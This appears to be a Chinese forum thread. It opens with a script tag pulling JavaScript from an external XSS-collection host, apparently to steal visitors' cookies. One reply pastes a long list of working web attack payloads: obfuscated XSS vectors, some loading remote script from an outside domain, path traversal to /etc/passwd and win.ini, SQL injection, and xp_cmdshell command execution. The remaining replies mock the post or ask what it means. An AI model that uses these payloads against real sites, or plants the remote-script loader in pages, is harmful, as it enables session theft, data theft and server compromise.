<script src="http://xss.lq-e.cn/ index.php/Xss/index/uid/189"></ script></code> - 源码

1 . ><script>alert(document.cookie)</script>

(罐子/@Ta/2014-05-12 04:28/样/源)

2 . ><script>alert(document.cookie)</script>
=’><script>alert(document.cookie)</script>
<script>alert(document.cookie)</script>
<script>alert(vulnerable)</script>

<script>alert(’XSS’)</script>
<img src="javascript:alert(’XSS’)">
<script>alert(/"Vulnerable/")</script>.jsp
"
../../../../../../../etc/passwd
../../../../../windows/win.ini

/index.html
?.jsp
?.jsp
<script>alert(’Vulnerable’);</script&gt
<script>alert(’Vulnerable’)</script>
?sql_debug=1
a\.aspx
a.jsp/<script>alert(’Vulnerable’)</script>
a/
a?<script>alert(’Vulnerable’)</script>
"><script>alert(’Vulnerable’)</script>
’;exec master..xp_cmdshell ’dir c:>c:/inetpub/wwwroot/?.txt’--&&
">
&
&SESSION_ID={SESSION_ID}&SESSION_ID=
1 union all select pass,0,0,0,0 from customers where fname=
../../../../../../../../etc/passwd
../../../../../../../../windows/system.ini

’’;!--"<XSS>=&{()}
<IMG SRC="javascript:alert(’XSS’);">
<IMG SRC=javascript:alert(’XSS’)>
<IMG SRC=JaVaScRiPt:alert(’XSS’)>
<IMG SRC=JaVaScRiPt:alert("XSS")>
<IMG SRC=javascript:alert('XSS'&#41>
<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>
<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
<IMG SRC="jav	ascript:alert(’XSS’);">
<IMG SRC="jav
ascript:alert(’XSS’);">
<IMG SRC="javascript:alert(’XSS’);">
"<IMG SRC=java/0script:alert(/"XSS/")>";’>out
<IMG SRC="javascript:alert(’XSS’);">
<SCRIPT>a=/XSS/alert(a.source)</SCRIPT>
<BODY BACKGROUND="javascript:alert(’XSS’)">
<BODY ONLOAD=alert(’XSS’)>
<IMG DYNSRC="javascript:alert(’XSS’)">
<IMG LOWSRC="javascript:alert(’XSS’)">
<BGSOUND SRC="javascript:alert(’XSS’);">
<br size="&{alert(’XSS’)}">
<LAYER SRC="/info/upimg/allimg/080417/0946110.jpg"></SCRIPT>
<IMG SRC="javascript:alert(’XSS’)"

<IMG SRC="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode">
<SCRIPT a=">"SRC="http://xss.ha.ckers.org/a.js"></SCRIPT>
<SCRIPT =">"SRC="http://xss.ha.ckers.org/a.js"></SCRIPT>
<SCRIPT a=">"’’ SRC="http://xss.ha.ckers.org/a.js"></SCRIPT>
<SCRIPT"a=’>’"SRC="http://xss.ha.ckers.org/a.js"></SCRIPT>
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://xss.ha.ckers.org/a.js"></SCRIPT>
<A HREF=http://www.go http://www.google.com/ogle.com/>link</A>

(罐子/@Ta/2014-05-12 04:29/样/源)

3 . 傻叼玩xss

(小桑/@Ta/2014-05-12 08:13/样/源)

4 . 垃圾的xss平台

(2/@Ta/2014-05-12 08:34/样/源)

5 . @齐子，@小桑，他发的什么意思

(小蒋同学/@Ta/2014-05-12 12:53/样/源)

6 . @小蒋同学百度一下xss

(2/@Ta/2014-05-12 12:56/样/源)

7 . .......

(icEz/@Ta/2014-05-12 13:05/样/源)

8 . 路过

(vpsender/@Ta/2014-05-19 00:41/样/源)